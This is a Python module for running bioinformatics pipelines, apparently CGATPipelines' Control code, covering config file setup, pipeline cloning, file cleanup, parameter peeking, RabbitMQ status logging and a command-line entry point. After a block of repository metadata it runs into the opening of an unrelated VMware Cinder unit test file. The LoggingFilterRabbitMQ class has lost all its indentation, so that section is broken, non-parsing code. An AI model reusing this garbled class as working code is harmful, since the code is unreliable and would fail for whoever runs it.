            # for/else: no source directory supplied the ini file.
            raise ValueError('''default config file for `%s`
not found in
%s
A pipeline cannot be run without this.
''' % (config_files, paths))
    # Copy Sphinx configuration files, enforce copy of 'conf.py' in case
    # CGATReport is used:
    dest = 'conf.py'
    # NOTE(review): unlike the ini loop above there is no early exit when
    # conf.py already exists -- the copy/symlink below still runs, and
    # os.symlink will raise if the link is already present.  Confirm
    # whether a skip was intended here.
    if os.path.exists(dest):
        E.warn("file `%s` already exists - skipped" % dest)
    for path in paths:
        src = os.path.join(path, dest)
        if os.path.exists(src):
            # Put sphinx files in separate dir:
            shutil.copyfile(src, os.path.join(report_dir, dest))
            # Create a softlink outside of report_dir dir for CGATReport:
            os.symlink(os.path.join(report_dir, dest), str(dest))
            E.info("created new configuration file `%s` " % dest)
            break
    else:
        # Only warn as pipeline can be run without report:
        E.warn('''default config file for `%s` not found in
%s
CGATReport nor Sphinx can be run without this''' % (dest, paths))
    # If other Sphinx config files are found, copy them if there is a skeleton
    # pipeline report to use:
    E.info('Looking for additional Sphinx configuration files.')
    sphinx_config_files = ['Makefile',
                           'make.bat',
                           'include_links.rst',
                           'index.rst',
                           ] # These are for a sphinx setup, not needed
    # with CGATReport
    # A 'report_pipeline_*.rst' template is
    # searched for below
    # Look for a pipeline report file:
    f_count = 0
    for path in paths:
        if os.path.exists(path):
            for f in os.listdir(os.path.abspath(path)):
                # TO DO:
                # This pattern matching is particular to
                # https://github.com/AntonioJBT/project_quickstart
                # Needs to be made more generic
                if fnmatch.fnmatch(f, 'report_pipeline_*.rst'):
                    f_count += 1
                    pipeline_report_file = f
    if f_count == 1:
        sphinx_config_files.append(pipeline_report_file)
    else:
        # Only warn as pipeline can be run without report:
        E.warn('''There is no pipeline report file matching
report_pipeline_*.rst
in the directories:
{}
{}
or
{}
Ignore this if you are using CGATReport.
'''.format(pipeline_path, pipeline_path_2, general_path)
               )
    # Copy the files across if they are found:
    for dest in sphinx_config_files:
        if os.path.exists(dest):
            E.warn("file `%s` already exists - skipped" % dest)
            continue
        for path in paths:
            src = os.path.join(path, dest)
            if os.path.exists(src):
                # Put sphinx files in separate dir:
                shutil.copyfile(src, os.path.join(report_dir, dest))
                E.info("created new configuration file `%s` " % dest)
                break
        else:
            # for/else: file not present in any search path.
            E.warn('''No sphinx-quickstart skeleton files such as:
{}
were found
in
{}
Continuing without.'''.format(dest, paths))
def printConfigFiles():
    '''
    Print the list of .ini files used to configure the pipeline
    along with their associated priorities.
    Priority 1 is the highest.
    '''
    filenames = PARAMS['pipeline_ini']
    print("\n List of .ini files used to configure the pipeline")
    total = len(filenames)
    if total == 0:
        print(" No ini files passed!")
        return
    print(" %-11s: %s " % ("Priority", "File"))
    for position, fname in enumerate(filenames):
        priority = total - position
        if priority == 1:
            print(" (highest) %s: %s\n" % (priority, fname))
        else:
            print(" %-11s: %s " % (priority, fname))
def clonePipeline(srcdir, destdir=None):
    '''clone a pipeline.

    Creates a mirror of the pipeline in `srcdir` inside `destdir`.
    Data files are mirrored by symlinking to their real targets, while
    configuration files and the pipeline database are copied, so newly
    created files in the clone do not affect the original.  Report,
    export and temporary directories are not mirrored.

    Cloning pipelines permits sharing partial results between
    pipelines, for example for parameter optimization.

    Arguments
    ---------
    srcdir : string
        Source directory
    destdir : string
        Destination directory. If None, use the current directory.
    '''
    if destdir is None:
        destdir = os.path.curdir
    E.info("cloning pipeline from %s to %s" % (srcdir, destdir))
    copy_files = ("conf.py", "pipeline.ini", "csvdb")
    ignore_prefix = (
        "report", "_cache", "export", "tmp", "ctmp",
        "_static", "_templates")

    def _ignore(p):
        # skip anything below report/temporary/cache locations
        return any(p.startswith(prefix) for prefix in ignore_prefix)

    for root, dirs, files in os.walk(srcdir):
        relpath = os.path.relpath(root, srcdir)
        if _ignore(relpath):
            continue
        for subdir in dirs:
            if _ignore(subdir):
                continue
            target = os.path.join(os.path.join(destdir, relpath, subdir))
            os.mkdir(target)
            # carry over the original directory's timestamps
            st = os.stat(os.path.join(root, subdir))
            os.utime(target, (st.st_atime, st.st_mtime))
        for fname in files:
            if _ignore(fname):
                continue
            source_fn = os.path.join(root, fname)
            target_fn = os.path.join(destdir, relpath, fname)
            if fname in copy_files:
                shutil.copyfile(source_fn, target_fn)
            else:
                # realpath resolves links - thus links will be linked to
                # the original target
                os.symlink(os.path.realpath(source_fn), target_fn)
def clean(files, logfile):
    '''clean up files given by glob expressions.

    Files are cleaned up by zapping, i.e. the files are set to size
    0. Links to files are replaced with place-holders.

    Information about the original file is written to `logfile`.
    In dry-run mode (``PARAMS["dryrun"]``) nothing is zapped and no
    logfile is written.

    Arguments
    ---------
    files : list
        List of glob expressions of files to clean up.
    logfile : string
        Filename of logfile.

    Returns
    -------
    counter : E.Counter
        Counts of files seen, zapped and links replaced.
    '''
    fields = ('st_atime', 'st_blksize', 'st_blocks',
              'st_ctime', 'st_dev', 'st_gid', 'st_ino',
              'st_mode', 'st_mtime', 'st_nlink',
              'st_rdev', 'st_size', 'st_uid')
    dry_run = PARAMS.get("dryrun", False)
    outfile = None
    if not dry_run:
        if not os.path.exists(logfile):
            outfile = IOTools.openFile(logfile, "w")
            outfile.write("filename\tzapped\tlinkdest\t%s\n" %
                          "\t".join(fields))
        else:
            outfile = IOTools.openFile(logfile, "a")
    c = E.Counter()
    for fn in files:
        c.files += 1
        if not dry_run:
            stat, linkdest = IOTools.zapFile(fn)
            if stat is not None:
                c.zapped += 1
                if linkdest is not None:
                    c.links += 1
                outfile.write("%s\t%s\t%s\t%s\n" % (
                    fn,
                    time.asctime(time.localtime(time.time())),
                    linkdest,
                    "\t".join([str(getattr(stat, x)) for x in fields])))
    E.info("zapped: %s" % (c))
    # Bug fix: outfile is only opened when not in dry-run mode; the
    # previous unconditional close() raised NameError under dryrun.
    if outfile is not None:
        outfile.close()
    return c
def peekParameters(workingdir,
                   pipeline,
                   on_error_raise=None,
                   prefix=None,
                   update_interface=False,
                   restrict_interface=False):
    '''peek configuration parameters from external pipeline.

    As the paramater dictionary is built at runtime, this method
    executes the pipeline in workingdir, dumping its configuration
    values and reading them into a dictionary.

    If either `pipeline` or `workingdir` are not found, an error is
    raised. This behaviour can be changed by setting `on_error_raise`
    to False. In that case, an empty dictionary is returned.

    Arguments
    ---------
    workingdir : string
        Working directory. This is the directory that the pipeline
        was executed in.
    pipeline : string
        Name of the pipeline script. The pipeline is assumed to live
        in the same directory as the current pipeline.
    on_error_raise : Bool
        If set to a boolean, an error will be raised (or not) if there
        is an error during parameter peeking, for example if
        `workingdir` can not be found. If `on_error_raise` is None, it
        will be set to the default, which is to raise an exception
        unless the calling script is imported or the option
        ``--is-test`` has been passed at the command line.
    prefix : string
        Add a prefix to all parameters. This is useful if the paramaters
        are added to the configuration dictionary of the calling pipeline.
    update_interface : bool
        If True, this method will prefix any options in the
        ``[interface]`` section with `workingdir`. This allows
        transparent access to files in the external pipeline.
    restrict_interface : bool
        If True, only interface parameters will be imported.

    Returns
    -------
    config : dict
        Dictionary of configuration values.
    '''
    caller_locals = getCallerLocals()
    # check if we should raise errors
    if on_error_raise is None:
        on_error_raise = not isTest() and \
            "__name__" in caller_locals and \
            caller_locals["__name__"] == "__main__"
    # patch - if --help or -h in command line arguments,
    # do not peek as there might be no config file.
    if "--help" in sys.argv or "-h" in sys.argv:
        return {}
    # Attempt to locate directory with pipeline source code. This is a
    # patch as pipelines might be called within the repository
    # directory or from an installed location
    dirname = PARAMS["pipelinedir"]
    # called without a directory, use current directory
    if dirname == "":
        dirname = os.path.abspath(".")
    else:
        # if not exists, assume we want version located
        # in directory of calling script.
        if not os.path.exists(dirname):
            # directory is path of calling script
            dirname = os.path.dirname(caller_locals['__file__'])
    pipeline = os.path.join(dirname, pipeline)
    if not os.path.exists(pipeline):
        if on_error_raise:
            raise ValueError(
                "can't find pipeline at %s" % (pipeline))
        else:
            return {}
    if workingdir == "":
        workingdir = os.path.abspath(".")
    # patch for the "config" target - use default
    # pipeline directory if directory is not specified
    # working dir is set to "?!"
    # Bug fix: 'and' binds tighter than 'or', so the original expression
    # applied the workingdir == "?!" test only to the "clone" case and
    # clobbered an explicitly supplied working directory for "config"
    # and "check".  Parenthesised so the placeholder test covers all
    # three targets.
    if ("config" in sys.argv or "check" in sys.argv or
            "clone" in sys.argv) and workingdir == "?!":
        workingdir = os.path.join(PARAMS.get("pipelinedir"),
                                  IOTools.snip(pipeline, ".py"))
    if not os.path.exists(workingdir):
        if on_error_raise:
            raise ValueError(
                "can't find working dir %s" % workingdir)
        else:
            return {}
    # run the external pipeline's "dump" target and parse its JSON output
    statement = "python %s -f -v 0 dump" % pipeline
    process = subprocess.Popen(statement,
                               cwd=workingdir,
                               shell=True,
                               stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE)
    # process.stdin.close()
    stdout, stderr = process.communicate()
    if process.returncode != 0:
        raise OSError(
            ("Child was terminated by signal %i: \n"
             "Statement: %s\n"
             "The stderr was: \n%s\n"
             "Stdout: %s") %
            (-process.returncode, statement, stderr, stdout))
    # subprocess only accepts encoding argument in py >= 3.6 so
    # decode here.
    stdout = stdout.decode("utf-8").splitlines()
    # remove any log messages
    stdout = [x for x in stdout if x.startswith("{")]
    if len(stdout) > 1:
        raise ValueError("received multiple configurations")
    dump = json.loads(stdout[0])
    # update interface
    if update_interface:
        for key, value in list(dump.items()):
            if key.startswith("interface"):
                dump[key] = os.path.join(workingdir, value)
    # keep only interface if so required
    if restrict_interface:
        dump = dict([(k, v) for k, v in dump.items()
                     if k.startswith("interface")])
    # prefix all parameters
    if prefix is not None:
        dump = dict([("%s%s" % (prefix, x), y) for x, y in list(dump.items())])
    return dump
class MultiLineFormatter(logging.Formatter):
    """Log formatter that indents continuation lines.

    Every line after the first is padded with spaces so the message
    body lines up under the first line, keeping multi-line log
    entries readable.
    """

    def format(self, record):
        formatted = logging.Formatter.format(self, record)
        if record.message:
            prefix, _ = formatted.split(record.message)
            formatted = formatted.replace('\n', '\n' + ' ' * len(prefix))
        return formatted
class LoggingFilterRabbitMQ(logging.Filter):
"""pass event information to a rabbitMQ message queue.
This is a log filter which detects messages from ruffus_ and sends
them to a rabbitMQ message queue.
A :term:`task` is a ruffus_ decorated function, which will execute
one or more :term:`jobs`.
Valid task/job status:
update
task/job needs updating
completed
task/job completed successfully
failed
task/job failed
running
task/job is running
ignore
ignore task/job (is up-to-date)
Arguments
---------
ruffus_text : string
Log messages from ruffus.pipeline_printout. These are used
to collect all tasks that will be executed during pipeline
executation.
project_name : string
Name of the project
pipeline_name : string
Name of the pipeline
host : string
RabbitMQ host name
exchange : string
RabbitMQ exchange name
"""
def __init__(self, ruffus_text,
project_name,
pipeline_name,
host="localhost",
exchange="ruffus_pipelines"):
self.project_name = project_name
self.pipeline_name = pipeline_name
self.exchange = exchange
# dictionary of jobs to run
self.jobs = {}
self.tasks = {}
if not HAS_PIKA:
self.connected = False
return
def split_by_job(text):
text = "".join(text)
job_message = ""
# ignore first entry which is the docstring
for line in text.split(" Job = ")[1:]:
try:
# long file names cause additional wrapping and
# additional white-space characters
job_name = re.search(
"\[.*-> ([^\]]+)\]", line).groups()
except AttributeError:
raise AttributeError("could not parse '%s'" % line)
job_status = "ignore"
if "Job needs update" in line:
job_status = "update"
yield job_name, job_status, job_message
def split_by_task(text):
block, task_name = [], None
task_status = None
for line in text.split("\n"):
line = line.strip()
if line.startswith("Tasks which will be run"):
task_status = "update"
elif line.startswith("Tasks which are up-to-date"):
task_status = "ignore"
if line.startswith("Task = "):
if task_name:
yield task_name, task_status, list(split_by_job(block))
block = []
task_name = re.match("Task = (.*)", line).groups()[0]
continue
if line:
block.append(line)
if task_name:
yield task_name, task_status, list(split_by_job(block))
# create connection
try:
connection = pika.BlockingConnection(pika.ConnectionParameters(
host=host))
self.connected = True
except pika.exceptions.AMQPConnectionError:
self.connected = False
return
self.channel = connection.channel()
self.channel.exchange_declare(
exchange=self.exchange,
type='topic')
# populate with initial messages
for task_name, task_status, jobs in split_by_task(ruffus_text):
if task_name.startswith("(mkdir"):
continue
to_run = 0
for job_name, job_status, job_message in jobs:
self.jobs[job_name] = (task_name, job_name)
if job_status == "update":
to_run += 1
self.tasks[task_name] = [task_status, len(jobs),
len(jobs) - to_run]
self.send_task(task_name)
def send_task(self, task_name):
    """Publish the current status of *task_name* to the topic exchange.

    Does nothing when no broker connection was established. Publish
    failures are logged as warnings, never raised.
    """
    if not self.connected:
        return
    status, total, completed = self.tasks[task_name]
    payload = {
        'created_at': time.time(),
        'pipeline': self.pipeline_name,
        'task_name': task_name,
        'task_status': status,
        'task_total': total,
        'task_completed': completed,
    }
    routing_key = "%s.%s.%s" % (
        self.project_name, self.pipeline_name, task_name)
    try:
        self.channel.basic_publish(exchange=self.exchange,
                                   routing_key=routing_key,
                                   body=json.dumps(payload))
    except pika.exceptions.ConnectionClosed:
        E.warn("could not send message - connection closed")
    except Exception as e:
        E.warn("could not send message: %s" % str(e))
def send_error(self, task_name, job, error=None, msg=None):
    """Publish a 'failed' status message for *task_name*.

    NOTE(review): the ``job``, ``error`` and ``msg`` parameters are
    accepted but never included in the published payload — confirm
    whether consumers expect them.
    """
    if not self.connected:
        return
    try:
        # task_status is unpacked but unused: status is forced to 'failed'
        task_status, task_total, task_completed = self.tasks[task_name]
    except KeyError:
        E.warn("could not get task information for %s, no message sent" %
               task_name)
        return
    data = {}
    data['created_at'] = time.time()
    data['pipeline'] = self.pipeline_name
    data['task_name'] = task_name
    data['task_status'] = 'failed'
    data['task_total'] = task_total
    data['task_completed'] = task_completed
    key = "%s.%s.%s" % (self.project_name, self.pipeline_name, task_name)
    try:
        self.channel.basic_publish(exchange=self.exchange,
                                   routing_key=key,
                                   body=json.dumps(data))
    except pika.exceptions.ConnectionClosed:
        E.warn("could not send message - connection closed")
    except Exception as e:
        E.warn("could not send message: %s" % str(e))
def filter(self, record):
    """logging.Filter hook: track task state from ruffus log records.

    Records emitted by ruffus' ``task.py`` of the form
    ``"<event> = <task_name>"`` update ``self.tasks`` and trigger a
    status message. Always returns True so no record is suppressed.
    """
    if not self.connected:
        return True
    # filter ruffus logging messages
    if record.filename.endswith("task.py"):
        try:
            before, task_name = record.msg.strip().split(" = ")
        except ValueError:
            # not in "<event> = <task>" form - pass through untouched
            return True
        # ignore the mkdir, etc tasks
        if task_name not in self.tasks:
            return True
        if before == "Task enters queue":
            self.tasks[task_name][0] = "running"
        elif before == "Completed Task":
            self.tasks[task_name][0] = "completed"
        elif before == "Uptodate Task":
            self.tasks[task_name][0] = "uptodate"
        else:
            # unrecognized event: no state change, no message
            return True
        # send new task status out
        self.send_task(task_name)
    return True
# Command-line usage text displayed by main()'s option parser; the
# positional command (make/show/plot/...) is parsed from args, not
# from --pipeline-action choices.
USAGE = '''
usage: %prog [OPTIONS] [CMD] [target]
Execute pipeline %prog.
Commands can be any of the following
make <target>
run all tasks required to build *target*
show <target>
show tasks required to build *target* without executing them
plot <target>
plot image (using inkscape) of pipeline state for *target*
debug <target> [args]
debug a method using the supplied arguments. The method <target>
in the pipeline is run without checking any dependencies.
config
write new configuration files pipeline.ini, sphinxreport.ini and conf.py
with default values
dump
write pipeline configuration to stdout
printconfig
write pipeline configuration to stdout in a user-friendly way so
it is easier to debug pipeline parameters
touch
touch files only, do not run
regenerate
regenerate the ruffus checkpoint file
check
check if requirements (external tool dependencies) are satisfied.
clone <source>
create a clone of a pipeline in <source> in the current
directory. The cloning process aims to use soft linking to files
(not directories) as much as possible. Time stamps are
preserved. Cloning is useful if a pipeline needs to be re-run from
a certain point but the original pipeline should be preserved.
'''
def main(args=sys.argv):
    """command line control function for a pipeline.

    This method defines command line options for the pipeline and
    updates the global configuration dictionary correspondingly.

    It then provides a command parser to execute particular tasks
    using the ruffus pipeline control functions. See the generated
    command line help for usage.

    To use it, add::

        import CGAT.Pipeline as P

        if __name__ == "__main__":
            sys.exit(P.main(sys.argv))

    to your pipeline script.

    Arguments
    ---------
    args : list
        List of command line arguments.
    """
    global GLOBAL_OPTIONS
    global GLOBAL_ARGS

    parser = E.OptionParser(version="%prog version: $Id$",
                            usage=USAGE)

    # NOTE: "touch" and "svg" are handled below but are reachable only as
    # positional commands (args[0]), not through --pipeline-action choices.
    parser.add_option("--pipeline-action", dest="pipeline_action",
                      type="choice",
                      choices=(
                          "make", "show", "plot", "dump", "config", "clone",
                          "check", "regenerate", "printconfig"),
                      help="action to take [default=%default].")
    parser.add_option("--pipeline-format", dest="pipeline_format",
                      type="choice",
                      choices=("dot", "jpg", "svg", "ps", "png"),
                      help="pipeline format [default=%default].")
    parser.add_option("-n", "--dry-run", dest="dry_run",
                      action="store_true",
                      help="perform a dry run (do not execute any shell "
                      "commands) [default=%default].")
    parser.add_option("-f", "--force-output", dest="force",
                      action="store_true",
                      help="force running the pipeline even if there "
                      "are uncommited changes "
                      "in the repository [default=%default].")
    parser.add_option("-p", "--multiprocess", dest="multiprocess", type="int",
                      help="number of parallel processes to use on "
                      "submit host "
                      "(different from number of jobs to use for "
                      "cluster jobs) "
                      "[default=%default].")
    parser.add_option("-e", "--exceptions", dest="log_exceptions",
                      action="store_true",
                      help="echo exceptions immediately as they occur "
                      "[default=%default].")
    # BUG FIX: dest was "terminate", which nothing ever read; the
    # pipeline_run() call below consumes
    # options.exceptions_terminate_immediately, so -i/--terminate had no
    # effect. Point dest at the attribute that is actually used.
    parser.add_option("-i", "--terminate",
                      dest="exceptions_terminate_immediately",
                      action="store_true",
                      help="terminate immediately at the first exception "
                      "[default=%default].")
    parser.add_option("-d", "--debug", dest="debug",
                      action="store_true",
                      help="output debugging information on console, "
                      "and not the logfile "
                      "[default=%default].")
    parser.add_option("-s", "--set", dest="variables_to_set",
                      type="string", action="append",
                      help="explicitly set paramater values "
                      "[default=%default].")
    parser.add_option("-c", "--checksums", dest="ruffus_checksums_level",
                      type="int",
                      help="set the level of ruffus checksums"
                      "[default=%default].")
    parser.add_option("-t", "--is-test", dest="is_test",
                      action="store_true",
                      help="this is a test run"
                      "[default=%default].")
    parser.add_option("--rabbitmq-exchange", dest="rabbitmq_exchange",
                      type="string",
                      help="RabbitMQ exchange to send log messages to "
                      "[default=%default].")
    parser.add_option("--rabbitmq-host", dest="rabbitmq_host",
                      type="string",
                      help="RabbitMQ host to send log messages to "
                      "[default=%default].")
    parser.add_option("--input-validation", dest="input_validation",
                      action="store_true",
                      help="perform input validation before starting "
                      "[default=%default].")

    parser.set_defaults(
        pipeline_action=None,
        pipeline_format="svg",
        pipeline_targets=[],
        multiprocess=40,
        logfile="pipeline.log",
        dry_run=False,
        force=False,
        log_exceptions=False,
        exceptions_terminate_immediately=False,
        debug=False,
        variables_to_set=[],
        is_test=False,
        ruffus_checksums_level=0,
        rabbitmq_host="saruman",
        rabbitmq_exchange="ruffus_pipelines",
        input_validation=False)

    (options, args) = E.Start(parser,
                              add_cluster_options=True)

    GLOBAL_OPTIONS, GLOBAL_ARGS = options, args
    E.info("Started in: %s" % PARAMS.get("workingdir"))
    # At this point, the PARAMS dictionary has already been
    # built. It now needs to be updated with selected command
    # line options as these should always take precedence over
    # configuration files.
    PARAMS["dryrun"] = options.dry_run
    PARAMS["input_validation"] = options.input_validation

    # use cli_cluster_* keys in PARAMS to ensure highest priority
    # of cluster_* options passed with the command-line
    if options.cluster_memory_default is not None:
        PARAMS["cli_cluster_memory_default"] = options.cluster_memory_default
        PARAMS["cluster_memory_default"] = options.cluster_memory_default
    if options.cluster_memory_resource is not None:
        PARAMS["cli_cluster_memory_resource"] = options.cluster_memory_resource
        PARAMS["cluster_memory_resource"] = options.cluster_memory_resource
    if options.cluster_num_jobs is not None:
        PARAMS["cli_cluster_num_jobs"] = options.cluster_num_jobs
        PARAMS["cluster_num_jobs"] = options.cluster_num_jobs
    if options.cluster_options is not None:
        PARAMS["cli_cluster_options"] = options.cluster_options
        PARAMS["cluster_options"] = options.cluster_options
    if options.cluster_parallel_environment is not None:
        PARAMS["cli_cluster_parallel_environment"] = options.cluster_parallel_environment
        PARAMS["cluster_parallel_environment"] = options.cluster_parallel_environment
    if options.cluster_priority is not None:
        PARAMS["cli_cluster_priority"] = options.cluster_priority
        PARAMS["cluster_priority"] = options.cluster_priority
    if options.cluster_queue is not None:
        PARAMS["cli_cluster_queue"] = options.cluster_queue
        PARAMS["cluster_queue"] = options.cluster_queue
    if options.cluster_queue_manager is not None:
        PARAMS["cli_cluster_queue_manager"] = options.cluster_queue_manager
        PARAMS["cluster_queue_manager"] = options.cluster_queue_manager

    PARAMS["ruffus_checksums_level"] = options.ruffus_checksums_level

    # apply -s/--set overrides ("name=value")
    for variables in options.variables_to_set:
        variable, value = variables.split("=")
        PARAMS[variable.strip()] = IOTools.str2val(value.strip())

    # the positional command overrides --pipeline-action; remaining
    # positional arguments are pipeline targets
    if args:
        options.pipeline_action = args[0]
        if len(args) > 1:
            options.pipeline_targets.extend(args[1:])

    # see inputValidation function in Parameters.py
    if options.input_validation:
        inputValidation(PARAMS, sys.argv[0])

    if options.pipeline_action == "check":
        counter, requirements = Requirements.checkRequirementsFromAllModules()
        for requirement in requirements:
            E.info("\t".join(map(str, requirement)))
        E.info("version check summary: %s" % str(counter))
        E.Stop()
        return

    elif options.pipeline_action == "debug":
        # create the session proxy
        startSession()

        # run a single pipeline method directly, bypassing dependencies
        method_name = options.pipeline_targets[0]
        caller = getCaller()
        method = getattr(caller, method_name)
        method(*options.pipeline_targets[1:])

    elif options.pipeline_action in ("make", "show", "svg", "plot",
                                     "touch", "regenerate"):

        # set up extra file logger
        handler = logging.FileHandler(filename=options.logfile,
                                      mode="a")
        handler.setFormatter(
            MultiLineFormatter(
                '%(asctime)s %(levelname)s %(module)s.%(funcName)s.%(lineno)d %(message)s'))
        logger = logging.getLogger()
        logger.addHandler(handler)
        messenger = None

        try:
            if options.pipeline_action == "make":

                # get tasks to be done. This essentially replicates
                # the state information within ruffus.
                stream = io.StringIO()
                pipeline_printout(
                    stream,
                    options.pipeline_targets,
                    verbose=5,
                    checksum_level=options.ruffus_checksums_level)

                messenger = LoggingFilterRabbitMQ(
                    stream.getvalue(),
                    project_name=getProjectName(),
                    pipeline_name=getPipelineName(),
                    host=options.rabbitmq_host,
                    exchange=options.rabbitmq_exchange)

                logger.addFilter(messenger)

                if not options.without_cluster:
                    global task
                    # use threading instead of multiprocessing in order to
                    # limit the number of concurrent jobs by using the
                    # GIL
                    #
                    # Note that threading might cause problems with rpy.
                    task.Pool = ThreadPool

                # create the session proxy
                startSession()

                #
                # make sure we are not logging at the same time in
                # different processes
                #
                # session_mutex = manager.Lock()
                E.info(E.GetHeader())
                E.info("code location: %s" % PARAMS["pipeline_scriptsdir"])
                E.info("Working directory is: %s" % PARAMS["workingdir"])

                pipeline_run(
                    options.pipeline_targets,
                    multiprocess=options.multiprocess,
                    logger=logger,
                    verbose=options.loglevel,
                    log_exceptions=options.log_exceptions,
                    exceptions_terminate_immediately=options.exceptions_terminate_immediately,
                    checksum_level=options.ruffus_checksums_level,
                )

                E.info(E.GetFooter())

                closeSession()

            elif options.pipeline_action == "show":
                pipeline_printout(
                    options.stdout,
                    options.pipeline_targets,
                    verbose=options.loglevel,
                    checksum_level=options.ruffus_checksums_level)

            elif options.pipeline_action == "touch":
                pipeline_run(
                    options.pipeline_targets,
                    touch_files_only=True,
                    verbose=options.loglevel,
                    checksum_level=options.ruffus_checksums_level)

            elif options.pipeline_action == "regenerate":
                # NOTE(review): touch_files_only is given the checksum
                # *level* here (ruffus uses a special value to mean
                # "regenerate checkpoint file") — confirm intended value.
                pipeline_run(
                    options.pipeline_targets,
                    touch_files_only=options.ruffus_checksums_level,
                    verbose=options.loglevel)

            elif options.pipeline_action == "svg":
                pipeline_printout_graph(
                    options.stdout.buffer,
                    options.pipeline_format,
                    options.pipeline_targets,
                    checksum_level=options.ruffus_checksums_level)

            elif options.pipeline_action == "plot":
                outf, filename = tempfile.mkstemp()
                pipeline_printout_graph(
                    os.fdopen(outf, "wb"),
                    options.pipeline_format,
                    options.pipeline_targets,
                    checksum_level=options.ruffus_checksums_level)
                execute("inkscape %s" % filename)
                os.unlink(filename)

        except ruffus_exceptions.RethrownJobError as value:

            if not options.debug:
                E.error("%i tasks with errors, please see summary below:" %
                        len(value.args))
                for idx, e in enumerate(value.args):
                    task, job, error, msg, traceback = e

                    if task is None:
                        # this seems to be errors originating within ruffus
                        # such as a missing dependency
                        # msg then contains a RethrownJobJerror
                        msg = str(msg)
                        pass
                    else:
                        task = re.sub("__main__.", "", task)
                        job = re.sub("\s", "", job)

                    if messenger:
                        messenger.send_error(task, job, error, msg)

                    # display only single line messages
                    if len([x for x in msg.split("\n") if x != ""]) > 1:
                        msg = ""

                    E.error("%i: Task=%s Error=%s %s: %s" %
                            (idx, task, error, job, msg))

                E.error("full traceback is in %s" % options.logfile)

                # write full traceback to log file only by removing the stdout
                # handler
                lhStdout = logger.handlers[0]
                logger.removeHandler(lhStdout)
                logger.error("start of error messages")
                logger.error(value)
                logger.error("end of error messages")
                logger.addHandler(lhStdout)

                # raise error
                raise ValueError(
                    "pipeline failed with %i errors" % len(value.args))
            else:
                raise

    elif options.pipeline_action == "dump":
        print(json.dumps(PARAMS))

    elif options.pipeline_action == "printconfig":
        print("Printing out pipeline parameters: ")
        for k in sorted(PARAMS):
            print(k, "=", PARAMS[k])
        printConfigFiles()

    elif options.pipeline_action == "config":
        # (Antonio) I've modified this section, see explanation and changes in the
        # writeConfigFiles function above.
        f = sys._getframe(1)
        caller = inspect.getargvalues(f).locals["__file__"]
        # CGATPipelines have a pipe_XX/pipe_XX hierarchy, but a simplified
        # version would only have pipe_XX/
        # so creating an additional pipeline_path
        # TO DO: clean this up
        pipeline_path = os.path.splitext(caller)[0]
        pipeline_path_2 = os.path.dirname(pipeline_path)
        # CGATPipelines have a "configuration" folder
        # adding a glob to have a bit more flexibility
        general_path = glob.glob(str(os.path.abspath(pipeline_path_2) +
                                     '/configuration*'))
        if not general_path:
            general_path = os.path.join(os.path.dirname(pipeline_path), "configuration")
        else:
            general_path = str(general_path[0])
        writeConfigFiles(pipeline_path, pipeline_path_2, general_path)

    elif options.pipeline_action == "clone":
        clonePipeline(options.pipeline_targets[0])

    else:
        raise ValueError("unknown pipeline action %s" %
                         options.pipeline_action)

    E.Stop()
| {
"content_hash": "b2ccbe4d65974627ab66155237df236e",
"timestamp": "",
"source": "github",
"line_count": 1165,
"max_line_length": 97,
"avg_line_length": 35.25150214592275,
"alnum_prop": 0.5563942729132171,
"repo_name": "AntonioJBT/CGATPipeline_core",
"id": "1d229b1473caa99d40f1b1010d40fbf378821a23",
"size": "41068",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CGATPipelines/Pipeline/Control_old_backup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "7463"
},
{
"name": "JavaScript",
"bytes": "285056"
},
{
"name": "Python",
"bytes": "394936"
},
{
"name": "Shell",
"bytes": "37635"
}
],
"symlink_target": ""
} |
"""
Test suite for VMware VMDK driver volumeops module.
"""
import mock
from oslo_utils import units
from oslo_vmware import exceptions
from oslo_vmware import vim_util
from cinder import test
from cinder.volume.drivers.vmware import exceptions as vmdk_exceptions
from cinder.volume.drivers.vmware import volumeops
class VolumeOpsTestCase(test.TestCase):
    """Unit tests for volumeops module."""
    # Upper bound on objects fetched per vSphere retrieval call;
    # passed to VMwareVolumeOps in setUp().
    MAX_OBJECTS = 100
def setUp(self):
    """Create a mocked session and the VMwareVolumeOps instance under test."""
    super(VolumeOpsTestCase, self).setUp()
    self.session = mock.MagicMock()
    self.vops = volumeops.VMwareVolumeOps(self.session, self.MAX_OBJECTS)
def test_split_datastore_path(self):
    """Verify parsing of '[datastore] folder/file' style datastore paths."""
    test1 = '[datastore1] myfolder/mysubfolder/myvm.vmx'
    (datastore, folder, file_name) = volumeops.split_datastore_path(test1)
    self.assertEqual('datastore1', datastore)
    self.assertEqual('myfolder/mysubfolder/', folder)
    self.assertEqual('myvm.vmx', file_name)
    # trailing whitespace inside the brackets is stripped
    test2 = '[datastore2 ] myfolder/myvm.vmdk'
    (datastore, folder, file_name) = volumeops.split_datastore_path(test2)
    self.assertEqual('datastore2', datastore)
    self.assertEqual('myfolder/', folder)
    self.assertEqual('myvm.vmdk', file_name)
    # a path without the '[datastore]' prefix is rejected
    test3 = 'myfolder/myvm.vmdk'
    self.assertRaises(IndexError, volumeops.split_datastore_path, test3)
def vm(self, val):
    """Create a mock vm in retrieve result format."""
    prop = mock.Mock(spec=object)
    prop.val = val
    mock_vm = mock.MagicMock()
    mock_vm.propSet = [prop]
    return mock_vm
def test_get_backing(self):
    """Verify get_backing for no, single and multiple query results."""
    name = 'mock-backing'
    # Test no result
    self.session.invoke_api.return_value = None
    result = self.vops.get_backing(name)
    self.assertIsNone(result)
    self.session.invoke_api.assert_called_once_with(vim_util,
                                                    'get_objects',
                                                    self.session.vim,
                                                    'VirtualMachine',
                                                    self.MAX_OBJECTS)
    # Test single result
    vm = self.vm(name)
    vm.obj = mock.sentinel.vm_obj
    retrieve_result = mock.Mock(spec=object)
    retrieve_result.objects = [vm]
    self.session.invoke_api.return_value = retrieve_result
    self.vops.cancel_retrieval = mock.Mock(spec=object)
    result = self.vops.get_backing(name)
    self.assertEqual(mock.sentinel.vm_obj, result)
    self.session.invoke_api.assert_called_with(vim_util, 'get_objects',
                                               self.session.vim,
                                               'VirtualMachine',
                                               self.MAX_OBJECTS)
    self.vops.cancel_retrieval.assert_called_once_with(retrieve_result)
    # Test multiple results
    # NOTE(review): 'vm' was rebound above to a MagicMock, so vm('1')
    # calls the mock rather than the helper self.vm — confirm intended.
    retrieve_result2 = mock.Mock(spec=object)
